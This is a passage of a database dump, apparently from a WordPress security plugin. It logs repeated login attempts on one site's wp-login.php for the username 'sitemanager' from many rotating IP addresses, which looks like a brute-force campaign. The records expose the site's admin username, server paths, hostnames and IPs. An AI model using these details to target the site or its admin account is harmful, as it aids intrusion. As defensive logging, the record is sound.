00:00:00'),(95639,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, deflate, br\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"103\";s:15:\"HTTP_USER_AGENT\";s:122:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"60754\";s:11:\"REMOTE_ADDR\";s:14:\"198.187.31.104\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"103\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747035720.1441309;s:12:\"REQUEST_TIME\";i:1747035720;}}','198.187.31.104',0,'2025-05-12 13:12:01','1970-01-01 00:00:00'),(95640,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"pt-BR,pt;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, deflate, br\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"102\";s:15:\"HTTP_USER_AGENT\";s:133:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.96 Safari/537.36 Edg/116.0.1938.62\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"50852\";s:11:\"REMOTE_ADDR\";s:14:\"162.241.102.44\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"102\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747036128.533056;s:12:\"REQUEST_TIME\";i:1747036128;}}','162.241.102.44',0,'2025-05-12 13:18:50','1970-01-01 00:00:00'),(95641,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ro-RO,ro;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, br, zstd\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"101\";s:15:\"HTTP_USER_AGENT\";s:122:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"47232\";s:11:\"REMOTE_ADDR\";s:12:\"144.76.3.233\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"101\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747036543.6510201;s:12:\"REQUEST_TIME\";i:1747036543;}}','144.76.3.233',0,'2025-05-12 13:25:45','1970-01-01 00:00:00'),(95642,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ar-SA,ar;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, br, deflate\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"102\";s:15:\"HTTP_USER_AGENT\";s:128:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"38522\";s:11:\"REMOTE_ADDR\";s:12:\"45.89.237.80\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"102\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747036963.686625;s:12:\"REQUEST_TIME\";i:1747036963;}}','45.89.237.80',0,'2025-05-12 13:32:45','1970-01-01 00:00:00'),(95643,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ko-KR,ko;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, br, zstd\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"115\";s:15:\"HTTP_USER_AGENT\";s:84:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0.1) Gecko/20100101 Firefox/125.0.1\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"38776\";s:11:\"REMOTE_ADDR\";s:13:\"14.160.24.238\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"115\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747037801.9191689;s:12:\"REQUEST_TIME\";i:1747037801;}}','14.160.24.238',0,'2025-05-12 13:46:43','1970-01-01 00:00:00'),(95644,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"uk-UA,uk;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, deflate, br\";s:11:\"HTTP_ACCEPT\";s:96:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"113\";s:15:\"HTTP_USER_AGENT\";s:134:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36 Edg/112.0.1722.68\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"59844\";s:11:\"REMOTE_ADDR\";s:13:\"198.54.114.49\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"113\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747038622.0885839;s:12:\"REQUEST_TIME\";i:1747038622;}}','198.54.114.49',0,'2025-05-12 14:00:23','1970-01-01 00:00:00'),(95645,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"de-DE,de;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, br, zstd\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"110\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"42420\";s:11:\"REMOTE_ADDR\";s:14:\"162.213.251.71\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"110\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747039027.2724929;s:12:\"REQUEST_TIME\";i:1747039027;}}','162.213.251.71',0,'2025-05-12 14:07:09','1970-01-01 00:00:00'),(95646,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"vi-VN,vi;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"113\";s:15:\"HTTP_USER_AGENT\";s:134:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36 Edg/112.0.1722.68\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"44099\";s:11:\"REMOTE_ADDR\";s:10:\"51.161.7.9\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"113\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747039429.359081;s:12:\"REQUEST_TIME\";i:1747039429;}}','51.161.7.9',0,'2025-05-12 14:13:51','1970-01-01 00:00:00'),(95647,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ko-KR,ko;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, br, zstd\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"118\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"47470\";s:11:\"REMOTE_ADDR\";s:13:\"162.0.235.187\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"118\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747039834.7829731;s:12:\"REQUEST_TIME\";i:1747039834;}}','162.0.235.187',0,'2025-05-12 14:20:36','1970-01-01 00:00:00'),(95648,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"tr-TR,tr;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, deflate, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"113\";s:15:\"HTTP_USER_AGENT\";s:128:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"40676\";s:11:\"REMOTE_ADDR\";s:13:\"66.29.137.129\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"113\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747040226.76705;s:12:\"REQUEST_TIME\";i:1747040226;}}','66.29.137.129',0,'2025-05-12 14:27:08','1970-01-01 00:00:00'),(95649,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"cs-CZ,cs;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, br, zstd\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"113\";s:15:\"HTTP_USER_AGENT\";s:122:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 